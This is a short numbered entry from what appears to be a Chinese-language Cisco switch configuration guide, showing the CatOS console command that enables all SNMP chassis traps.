  97. 启用所有SNMP chassis 陷阱:
  Console>(enable) set snmp trap enable